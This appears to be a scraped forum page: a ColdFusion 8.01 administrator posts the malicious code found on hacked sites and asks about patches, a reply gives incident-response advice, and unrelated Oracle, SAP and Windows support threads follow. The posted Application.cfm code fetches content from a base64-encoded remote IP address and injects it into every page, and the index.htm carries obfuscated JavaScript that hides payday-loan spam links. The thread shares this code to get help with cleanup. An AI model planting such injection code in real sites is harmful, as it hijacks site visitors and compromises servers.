CF8.01 hacked. Need info on patches
Yesterday some of our hosted sites were hacked using code pasted below. We're running CF 8.01 and I'm wondering if there is a cumulative secutity patch that we can apply or If I should just apply every security patch that I can find. I noticed that this particular vulnerability was patched for CF9 and 10 about six weeks ago.
Here's the hack:
Application.cfm
<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">
<cfset mmy = cfhttp.FileContent><cfoutput>
#mmy#
</cfoutput>
</cfsavecontent>
<CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">
<cfset cfs = cfhttp.FileContent>
<cfif (FindNoCase("</div>",paga) GT 0)>
<cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>
<cfelseif (FindNoCase("</table>",paga) GT 0)>
<cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>
<cfelseif (FindNoCase("</a>",paga) GT 0)>
<cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>
<cfelse>
<cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>
</cfif>
<cfoutput>
#paga#
</cfoutput>
<cfabort>
</cfif>
<cffunction name="hSWaawe">
<cfargument name="HxzcGlk">
<cfset Ypg = ToString(ToBinary(HxzcGlk))>
<cfreturn Ypg>
</cffunction>
Index.htm
<html>
<head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.thehiltonorlando.com/">
</head>
<body>
<br>
<br>
<br>
<br>
<center>
<a href="http://www.thehiltonorlando.com/">This page has moved. Please click here if you are not automatically redirected in a moment...</a><script language="JavaScript">function zdrViewState()
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','99779188 90','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();
</script>
<p class="zdroq">
Most of the time, the borrower would <a href="http://www.paydayloans-online-uk.co.uk/" title="Payday">payday</a> be the one jeopardized. Applying to various payday loan sites could create suspicion to the lender <a href="http://payday-loans-fts.co.uk/" title="Payday Loans">payday loans</a> and this could make the approval process unnecessarily burdening. Having a checking account is also a <a href="http://best-rates-payday-loans.co.uk/" title="Http://best-rates-payday-loans.co.uk/">http://best-rates-payday-loans.co.uk/</a> must. They would also need this in order to withdraw money from your account when the payment is <a href="http://bad-credit-payday.co.uk/" title="Payday Loans Bad Credit">payday loans bad credit</a> due. In the long run, you would see that they have high interest rates that would be equivalent to wasting your <a href="http://payday-loans-eng.co.uk/" title="Payday Loans Uk">payday loans uk</a> money. </p>
</center>
</body>
</html>
Thanks in advance.
--Jeremy
Those that have already applied the latest patch on CF9/10 but have been hacked, do you have a file /CFIDE/h.cfm /CFIDE/i.cfm or /CFIDE/help.cfm it is possible you had already been hit before applying the patch and still had a backdoor on your server. Note the file could be pretty much anywhere but under /CFIDE somewhere is a likley location.
It is also possible that you have common third party software with a vulnerability that was hit, among many other things. It would be a good idea to review the web server logs around the time of the incident to see if you can uncover anything.
If you find something that appears to be a new exploit you should send it to the Adobe Product Security Incident Response Team rather than posting it here: http://www.adobe.com/support/security/alertus.html
In addition to applying patches you should also follow the ColdFusion Lockdown Guides:
http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/910 25512-cf9-lockdownguide-wp-ue.pdf
http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion-enterpri se/pdf/CF10%20Lockdown%20Guide.pdf
Pete Freitag,
HackMyCF.com
Foundeo Inc.
Similar Messages
-
Hi,
I'm currently trying active/passive configuration with oracle RAC, and found that Oracle RAC one node is the solution. During my search, i also found some forum explaining how to convert to RAC one node and says that i need to download patch -9004119. This patch would be installed on RAC and so on.
I'm just not able to find this patch, Could anyone provide me the downloadable/installable or the link of *9004119*
Also, any examples or links of active/passive failovers would be really helpful. I'm doing trial and error method from a long time but no luck!
Just to mention,
Oracle RAC : active /active: mainly used for load balacing.
Oracle RAC one node: Active/passive : mainly used for cold failovers
Thanks in advance!
Cheers
MeghaAgain, RAC one-node enables you, in certain scenarios, to have 2 instances up for a specific amount of time. If you need only active-passive without the option to have 2 instances up you can use the Oracle database as a regular resource. You can read about it here: http://blogs.oracle.com/xpsoluxdb/entry/clusterware_11gr2_setting_up_an_activepassive_failover_configuration
You can read about RAC one node here: http://docs.oracle.com/cd/E11882_01/rac.112/e16795/onenode.htm#RACAD7894
And again, I don't know about the patch, but I'm trying to understand if you need rac one-node, or maybe a regular active-passive is enough for you.
Liron -
Need Info to access My Oracle support account
Hi..
I need info regrading the My Oracle support account.I came to know that It needs a CSI ,How can I get this CSI ? Will Oracle charge for CSI ? If so , may I know the amount ?
Actually ,I need to download some patches for Solaris Sparc 10u10 its very urgent .Pls help me
Thanks in advance.A CSI is a "Customer Support Identifier" so you need a support contract to get one, yes.
You need to talk to your local sales rep to buy it, or, right on the support front page before you log in is a link to [url http://www.oracle.com/support/contact.html]Contact Support
John -
MOVED: Need info on windows xp pro purchase
This topic has been moved to Operating Systems.
Need info on windows xp pro purchaseA Windows 8.1 Product Key will not work for a Windows XP install.
Please do not read this sentence. Please ignore the previous sentence.
Hi,
We wont use the Win 8.1 Product Key - We will Purchase new Windows 8.1 License for the fourth PC but install our copy of Win XP on the machine (we have only 3 License that we used for the older 3 machines).
Carey's reply only speaks to the technical aspects of installing a dual boot environment. It says nothing about licensing which is what I think you are asking about. I do not believe that you can purchase a Windows 8.1 License and apply it to a
Windows XP install. You need to enter in the Product Key when the OS is installed and I seriously doubt that the XP install will accept the 8.1 Key. If you don't have a 4th key for XP you won't be able to have a legal copy installed.
Please do not read this sentence. Please ignore the previous sentence. -
Error while navigating planning 9.3.1 through workspace/ need info on cpx,
Hi all
Hey I installed the planning 9.3.1 and also I created the application name, using planning address. but the problem is I am unable to navigate through workspace. I am getting three dialog boxes....
" invalid or could not find module configuration"
"Required application module hyperioin planning app wizard is not configured.please contact your administrator"
" Communication error"
I'm able to see the application name in projects of shared services. Can any one face the same situation , and also I need info regarding how to initialize modules of capx and wfp.
regards
M.VHi,
If you did a standard install then it should be running on port 19000 as well.
I take it workspace is working fine on port 19000
http://<hostname>:19000/HyperionPlanning/LogOn.jsp
^ this will be your workspace servername..
When you run the configuration utility for Reporting and Analysis and the section "Configure Web Server", this is where you set up the Apache Server for workspace, there is an option for "Planning", this should be ticked and the correct planning server entered as it will default to the workspace server.
The apache server redirects requests on the standard workspace port 19000 to the correct server and port, so for planning it redirects to the planning server and port 8300.
Cheers
John -
Need Info about BW CRM Analytics
Hi all,
Guys,
Please help me out...
I need Info about BW with CRM Analytics
What are the core areas where data's are extracted for CRM to BW
What will be the Interview question related to BW CRM Analytics
If possible if u have any docs kindly email me at [email protected]
Thanks in Advance.
Jaffer Ali.SDear Jaffer Ali S.,
The following types of analyses can be carried out:
<b>CRM Lead Analysis</b>
Use the InfoCube CRM Lead Management (Technical Name: 0MKTG_C01) for reporting.
The Lead Management InfoCube contains all the characteristics and data used for the administration of leads. This InfoCube enables you to execute the following standard queries available in SAP BW:
Channel Analysis
Efficiency Reporting
Historical Evaluation
Lost Leads
Channel Management: Top-n Lost Leads (Current Year)
<b>CRM Activities Analysis</b>
Use the InfoCube CRM Activities (Technical Name 0CSAL_C01) for reporting.
The InfoCube for activities in CRM provides the data basis for evaluating business activities undertaken by your employees. It provides you with information about how much time is being spent on contacting the customer, whether customers actively seek out contact with your company and how intensively your employees look after your customers. It delivers data for queries such as:
Intensity of customer care
Activity History
Success/failure analysis
<b>Customer Interaction Center (CIC)</b>
Activate the InfoCube Interactive Scripting Evaluation (IC WinClient) 0CRM_CIC1.
Interactive Scripting Evaluation (IC WinClient)
This InfoCube provides the data base for the interactive scripting evaluation. It supplies the data to the Interaction Center (IC): Interactive Scripting Evaluation query.
<b>Opportunities Analysis</b>
Activate InfoCube 0CRM_C04 - Opportunities.
The CRM Opportunities InfoCube contains all the characteristics and data used for the opportunities analyses.
<b>Sales Order Complaints Analysis</b>
Activate InfoCube Complaints (Technical name: 0CSAL_C09).
You can carry out the complaint analysis on a daily, monthly, weekly or a quarterly basis. The analysis can be done in relation to CRM Service Organization, CRM Sales Organization, CRM Product, and Sold-To Party.
<b>Service Qualtiy Analysis</b>
Activate the MultiProvider 0CSRVMC04 - CRM Service - Orders and Confirmations with Complaints.
The MultiProvider 0CSRVMC04 - CRM Service - Orders and Confirmations with Complaints gets the data from the following ODS objects for analyses in various queries:
0CRM_PROI - Orders: Item Data
0CRM_COI - Controlling (Item Data)
0CRM_CNFI - Confirmations (Item Data)
0CRM_COMP - CRM Complaints (Items)
Let me know if you need further help.
Reward points if it helps.
Regards,
Naveen. -
Need info on Mass Run FKK_EBS_TOI_COPA
HI,
For SAP FS-CD project, We want to post data into CD by generating the IDOC through LSMW in Delayed Status (With out posting) and will be posted using Mass Run FKK_EBS_TOI_COPA.
What is the standard process of posting throguh IDOC. when i post through IDOC will they be posted with delayed status ( withour real postings). Do we have to run Mass Run FKK_EBS_TOI_COPA for real postings.
I need to know the relevant events for Mass Run FKK_EBS_TOI_COPA.
Also i need info on how to track errors on the below; Is there any way where we can track errors on the below
1) LSMW Data Read/Convert
2) IDOC generation with error Status
3) FKK_EBS_TOI_COPA Mass run SLG1 log
Please provide the information.
Edited by: CVMaruthiRao on Jan 5, 2012 8:15 AMHI CVMaruthiRao,
IDOC generation with error Status --> You can use the WE05 transaction, in this transaction you will see the error description and you can fixe!
FKK_EBS_TOI_COPA Mass run SLG1 log --> In SLG1 you will see only the error after the IDOC processing.... in this case you alredy have the DOCUMENT (FPE1) Struture... and you can see any error at the document creation... but not on the IDOC processing.
WE19 you can use for creat any IDOC test you need...
I have a helpfull IDOC MANUAL (TOI COPA) configuration if is interesant for you , just send me an email.... andreppf hotmail com !!
I'm olso in an FS-CD project... but in my client we are not using the TOI COPA ... I have used in RM-CA projet...
André Frgulhetti.... -
HI Experts,
I need info related to the table LATP_ENQ.
We create sales order in CRM, through some B-Docs order will be replicated in ECC.
Entries are getting created in this table based on availability of the materials.
Through Z-Transaction code, we delete entries in this table.
Sometimes blank entries are getting created in this table, I would like to know in which scenario this table is getting updated.
Regards,
SwarajHi Swaraj
As it is a Z transaction t.code and as you have deleted the table when we upgrade our ECC version then those blank tables have to be upgraded
Regards
Srinath -
Hello,
I need info abt billing Outputs - The language is maintained in Bill to party (Customer master), Its maintained in Condition record, It can be changed while creating the invoice.
Now my question is, which of the above three cases has got highest priority.
Could some one provide me some info on this?
Regards,
KrishnaBy default, we will maintain language in Bill-to-Party & also Condition record. But if required, it can be chaged at Invoicing level while taking output. Priority will be Bill-to-party, followed by Condition Record.
Regards,
Rajesh Banka -
Hi all,
i am in mid of RA Config...
where in i need to Assign the Line ids to cost elements
here we create the coding mask for the cost element to be assigned to line ids...
so we need to create diff cost elements a/c to the coding mask....????is it so....
so in next step ie in "Update of WIP calc and RA(OKG4)"
where in for our Cntrl area i need to maintain diff cost elements....
so now i am finding the problem in creating those cost elements.... for each diff cost element types ie primary,sec,rev,settled...do i need to create diff G/L account ???? coz it asking fo it so....and hw to create those diff cost element..
is it thru (ka01)....
i have link regarding RA...but it does nt say anything abt these cost elements...
need info on this...
reply soon for this thread...Hi Amit,
While i was doing the config according to the notes given by u...
i was stuck in OKG8
they have told me to set RA cat as RFKA and POCB
BUT THOSE REC DOES NT EXISTS....
where in i can create these RA category.....or can i use any alternative RA category
so can u tell me wat these mean if u knw...and which P&L and Balance a/c need to be used or created and provide the TCOde if u have as the one of my CO consulatant hasnt turned up today....so i only have to create them..
AND TO ARCHIVE THE PROJECT IS THE STATUS OF PROJECT MUST BE SET TO CNF MCNF TECO
OR ITS ENOUGH THT ITS BEEN RELEASED...
REGARDS,
PREETI.P.G -
Need info on basics of SAP Business One
Hi Gurus !
I need info on basic stuffs for SAP business one 2007 . I tried searching in forums and help but was not able to gather good info...
Request u to pls guide me on :
1. What is SAP bsuiness one 2007 and how it is diff from ecc 6 etc ..?
2. How it is benefical for small and mid size businesses ?
3, How much is the Cost / licence ? ( if it can be discussed here ! )
4. How many users it can cater to ? I mean what is min and max suggeted ...
Thx !Hi,
You have too many questions in one posting. There is a forum rule that one question per one thread.
For your question 1, check this link:
http://wiki.sdn.sap.com/wiki/display/B1/SAPBusinessOne
Thanks,
Gordon -
Need Info on RDA-enabled data source based on FM
Hi,
I need Info on RDA-enabled data source based on Function Module.
How to implement it?
Thanks & Regards,
Rashmi.Hi Rashmi
Check this link
http://help.sap.com/saphelp_nw70/helpdata/EN/52/777e403566c65de10000000a155106/frameset.htm
[under tab Tranferring Transaction Data from Source Systems (RDA)]
http://help.sap.com/saphelp_nw70/helpdata/EN/3f/548c9ec754ee4d90188a4f108e0121/frameset.htm
Regards
Jagadish -
Need help with Patch Tool in CS5
I am having a problem using the patch tool in Photoshop CS5. I click on the Patch Tool and select the Source option from the upper tool bar. Then I circle a gray area in the background of my photo and, holding down the left mouse button, I drag the selection to a black area in the background and release the mouse button. Instead of turning the selected area black it just makes the area slightly darker than it was originally. I just don’t understand why I can’t use the patch tool and any help would be appreciated.
Thank you very much for these suggestions. Robert
Noel Carboni <[email protected]> wrote:
Noel Carboni http://forums.adobe.com/people/Noel+Carboni created the discussion
"Re: Need help with Patch Tool in CS5"
To view the discussion, visit: http://forums.adobe.com/message/4308270#4308270 -
I need info about CL_XML_DOCUMENT
Hi to all,
I need info about the class CL_XML_DOCUMENT and his methods.
I only have seen information of a few methods.
Where can I find more information and examples of use about this class?Hi,
This question is already answered before in this forum, check out the below link -
Information about CL_XML_DOCUMENT
Hope this helps. -
Hi,
I need info on certain options which I see when I right click components in the track.
1. Create project
2. Sync sources
3. Sync archives
4. Refresh
5. Sync used DCs
6. Remove from client
7. Build
Thanks,
AravindDid you try [help.sap.com|http://help.sap.com]?
Maybe you are looking for
-
How to get current sesssion information using Webappscontext in servlet?
Hi, I have an applet embedded in a self-service page (using OAHTMLWebBean). This applet sends information to a servlet, to query the database. I would like to use the session that was created when I logged into Oracle Applications as the session for
-
Using a hasmap value in an if statement
Hello all, I have a hashmap that has a hashmap for its value. Basically the the main hash map contains a "location" as the key and the value is a hash map that has two keys one for "assessed" which value will be "yes" or "no" and the other key is "st
-
Iphone restore from iCloud on sat still not working properly
Most of phone functions are working but still waiting for apps to download and can't get imusic app to work well won't play any videos.
-
Mail app is not allowing me to get my aol account online. The error triangle appears no matter what I try. Connection doctor gives this: +Could not connect to this imap server. Check your network connection and that you entered the correct informatio
-
I can't get the Web Gallery button on my iPhone. I do have iLife '08, .Mac account and published successfully albums to Web Gallery on .Mac from iPhoto. I followed the instructions how to transfer the albums to iPhone. I factory restored my iPhone an